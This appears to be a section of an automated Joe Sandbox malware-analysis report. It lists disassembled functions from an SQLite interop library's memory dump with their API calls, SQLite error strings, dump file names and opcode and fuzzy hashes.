Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B2A3,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6D5F0

Strings

%s at line %d of [%.10s], xrefs: 6BC6D5E9
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6D5DA
misuse, xrefs: 6BC6D5E4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 6e6eb3ff76ccf2fc196d1521b890562aa36f8c46caefbc78486b9ef2394e613c
Instruction ID: 2a5b97eebe84dbd5420f7418fe2eae8499031ea96515a57c87523a55d235f2bd
Opcode Fuzzy Hash: 6e6eb3ff76ccf2fc196d1521b890562aa36f8c46caefbc78486b9ef2394e613c
Instruction Fuzzy Hash: CB41E6B1BA52018FDB04CF25D8C1E4B37A5BFC5794F2484A8E91D8B345F638E911CB65

Function 6BC55370 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001030B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BC55C33,?,00000001,00000000), ref: 6BC554B7

Strings

%s at line %d of [%.10s], xrefs: 6BC554B0
database corruption, xrefs: 6BC554AB
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC554A1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 062130a8f32f529a6f1db27f65eae72062b228c938bb672d2ffb41354d09d7fc
Instruction ID: 0c78a4aba781d236004d556c91cdd2f23ad844d952e0694ed1bd6e54ec7a6eaf
Opcode Fuzzy Hash: 062130a8f32f529a6f1db27f65eae72062b228c938bb672d2ffb41354d09d7fc
Instruction Fuzzy Hash: 4C41B372A152098BDB14CF88D5817AEB3B1FF84311F1040BDDA199B341F739AA71CB95

Function 6BC73B30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000122A6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,00000000,?,6BC7A704,00000000,?,?,6BC7A7BA,00000000), ref: 6BC73C7B

Strings

%s at line %d of [%.10s], xrefs: 6BC73C74
database corruption, xrefs: 6BC73C6F
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC73C65

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 36b34edddae7b03e0f9f93dbe30d0e8fc936eff60054ec34470c27f352b04ae2
Instruction ID: cdedb48134b1552774fd95512d3904796e0f231814e47d4042517b5660f1177f
Opcode Fuzzy Hash: 36b34edddae7b03e0f9f93dbe30d0e8fc936eff60054ec34470c27f352b04ae2
Instruction Fuzzy Hash: 2E41AB617586500AD330AF79A8817A2F7E0DB80716F4006FFD9D9C7681F31AE686C3A1

Function 6BC63790 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000119B4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,74FF8504,6BC8AEB6,?,6BC8593B,?,?,?,?,?,?,6BC8AEB6), ref: 6BC637C4

Strings

%s at line %d of [%.10s], xrefs: 6BC637BD
database corruption, xrefs: 6BC637B8
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC637AE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 021b5c756582bdb525b31a0fb47351f25074aef863d2316f3fe0f2a53212a6fc
Instruction ID: 26fef1062688c92f083a61c5ff26af29f7a3b2d0a9b21a113cf23322ccb76699
Opcode Fuzzy Hash: 021b5c756582bdb525b31a0fb47351f25074aef863d2316f3fe0f2a53212a6fc
Instruction Fuzzy Hash: 1131D672A152156BC710CF6CDC81DAA77A4EBC46A4F044169FD489B340FB38EE5587E2

Function 6BC55240 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010ED5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,?), ref: 6BC55273

Strings

%s at line %d of [%.10s], xrefs: 6BC5526C
database corruption, xrefs: 6BC55267
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5525D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 6e9053a22774951f6ad32c465444a3ce8d76d40874c4c9c1da5acbd89fb6561c
Instruction ID: bb08ee54a3ec2433afe286ef8f1e3d6f6f3a13991ba38702cbf39487aa562d31
Opcode Fuzzy Hash: 6e9053a22774951f6ad32c465444a3ce8d76d40874c4c9c1da5acbd89fb6561c
Instruction Fuzzy Hash: 35312372B142099FC700CFA9C881BAAB7A5EB48325F1405A8ED4DCB345FB74DA61C7A4

Function 6BC608B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000110A4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6094C

Part of subcall function 6BC55240: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010ED5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,?), ref: 6BC55273

Strings

%s at line %d of [%.10s], xrefs: 6BC60945
database corruption, xrefs: 6BC60940
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC60936

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 66596acabbcf1d619804c128a8272c69dd68f576153fde0714ddfe3e77a5bcd1
Instruction ID: 67560313319cfcd87be35fcc459846acee50e1ee1bd2e457172e1be5b271f3bc
Opcode Fuzzy Hash: 66596acabbcf1d619804c128a8272c69dd68f576153fde0714ddfe3e77a5bcd1
Instruction Fuzzy Hash: 6631B3B5E15609ABDB14CF95C8C1FAEB3F1AF48705F10444CE595AB640F738AB84CB61

Function 6BC55160 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010F1C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?), ref: 6BC55222

Strings

%s at line %d of [%.10s], xrefs: 6BC5521B
database corruption, xrefs: 6BC55216
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC551D1, 6BC5520C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 7789004ec5411fbf7fa7fbaf318751435b8d301014056d96531b7ab93a01ac11
Instruction ID: 680c6aeac93d44ada484f9ea8348021e13d495e8c56e86580f4bc14135c47f7c
Opcode Fuzzy Hash: 7789004ec5411fbf7fa7fbaf318751435b8d301014056d96531b7ab93a01ac11
Instruction Fuzzy Hash: 0F219A73B640049FD3148B6DCC42F9BB795EB89220B1501A8EE09DB305FA34DD2283A5

Function 6BC56750 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 6BC24010: _memmove.LIBCMT ref: 6BC24076

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000353A1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,6BC5BEE4,?), ref: 6BC5681E

Strings

%s at line %d of [%.10s], xrefs: 6BC56817
database corruption, xrefs: 6BC56812
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56808

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d._memmove
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 3148929312-2469029621
Opcode ID: 5622b03a0eeff7985893e85dac1186ec62a7c6ae0decd6f3740e7c39343e1142
Instruction ID: 48bd438f0c1be1500b6caf955a6831d4822b4b3c6d641c8d8854f19d3caafb24
Opcode Fuzzy Hash: 5622b03a0eeff7985893e85dac1186ec62a7c6ae0decd6f3740e7c39343e1142
Instruction Fuzzy Hash: 332137729105059BDB04CF19D881B9AB7B8EF80258F1440B5DD4A9B20AF735EFB9CBD4

Function 6BCC1970 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000183BB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCC1997

Strings

%s at line %d of [%.10s], xrefs: 6BCC1990
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC1981
misuse, xrefs: 6BCC198B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 30d39108cc41bf1cbc4ff6b99be1711871d6a6c0a5a317f9af26a4bd20b1c5d6
Instruction ID: 35d8aae534d310be4c2938575170eb70fc0120671355b27b272939320415e571
Opcode Fuzzy Hash: 30d39108cc41bf1cbc4ff6b99be1711871d6a6c0a5a317f9af26a4bd20b1c5d6
Instruction Fuzzy Hash: B221C872B216245BD7108E6D9C41E6B73A8AF54625B054269ED1DEB340FB38EE1443E2

Function 6BC6BD10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC6BD8A
database corruption, xrefs: 6BC6BD85
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6BD7B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 0-2469029621
Opcode ID: 2d2c9f796e2ef549183ba6ef0d22e6b1a201a8de6afbb4cc02c4daf8d84d1b59
Instruction ID: b10e72030b289c78bcd6d2f08b252731bb513e0078c08f71be89b57f781064f6
Opcode Fuzzy Hash: 2d2c9f796e2ef549183ba6ef0d22e6b1a201a8de6afbb4cc02c4daf8d84d1b59
Instruction Fuzzy Hash: 1C21C6767141146BD704DF68EC82DAB73A9DBC06B5B04406AFD088B245FB35ED5287E0

Function 6BC3FB10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3FB85
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3FBB1
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC3FBD1

Strings

malformed JSON, xrefs: 6BC3FBA0

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$I1bf8975e567ea97a.
String ID: malformed JSON
API String ID: 2044891589-4000051135
Opcode ID: f929129ca0cbeb5d052fe87a1fbec3835c57b6624e43ab491a2916f472a94a4a
Instruction ID: 63ff793286ffa0301dd890ad778e5b4c4f1cc30c4fd47625292552f8af4b56fb
Opcode Fuzzy Hash: f929129ca0cbeb5d052fe87a1fbec3835c57b6624e43ab491a2916f472a94a4a
Instruction Fuzzy Hash: E221B5F08197554FD7208F399810B137BE45F1535CF104AADE8A98B291F77DE2448B91

Function 6BC56520 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005AB8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC5B20E,00000000,?,?,?), ref: 6BC565D2

Strings

%s at line %d of [%.10s], xrefs: 6BC565CB
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC565B0, 6BC565BC
misuse, xrefs: 6BC565C6

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 7b7406fb8db22c2b2474580a7269332aed9b29588e87121bc5e9b5479ed5e1ba
Instruction ID: 5086f7d412693db4329037dbd1db5b363035885d3df7513766c7086b63f37e87
Opcode Fuzzy Hash: 7b7406fb8db22c2b2474580a7269332aed9b29588e87121bc5e9b5479ed5e1ba
Instruction Fuzzy Hash: FE1189726417019FFB008F28D841B427BA4FB81728F508079E9184F345F739E625CBA5

Function 6BC58240 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A68D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5826A

Strings

%s at line %d of [%.10s], xrefs: 6BC58263
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58254
misuse, xrefs: 6BC5825E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 31464ad42261defa231dc8e1ce77b9b3659c9852b0151be46d4a8ba19b1ccbb8
Instruction ID: fefc54bf184ec04cb05a412b5aeb69b820d05c4401286f58233895bfd79899a8
Opcode Fuzzy Hash: 31464ad42261defa231dc8e1ce77b9b3659c9852b0151be46d4a8ba19b1ccbb8
Instruction Fuzzy Hash: 85112972621B049FE7109B74DC81E177BA4EF40629F040169EA0ADB201E62CE92586B5

Function 6BC53660 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B0C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC53684

Strings

%s at line %d of [%.10s], xrefs: 6BC5367D
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5366E
misuse, xrefs: 6BC53678

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 96c0306230c00814c2fb35020c5a0125068df0eeef2960f8b68f34fa246f13f7
Instruction ID: b3dd67106354c554a52399d6ac7f2fbf0e9cc5749a4c07f26b1572d6f06d97d2
Opcode Fuzzy Hash: 96c0306230c00814c2fb35020c5a0125068df0eeef2960f8b68f34fa246f13f7
Instruction Fuzzy Hash: 2211ECB2D1120597DB10DF74D882B5AB7A8BB80259F004065DC1E9F342FB3DDB3486E6

Function 6BC548A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC54961
database corruption, xrefs: 6BC5495C
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC54952

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
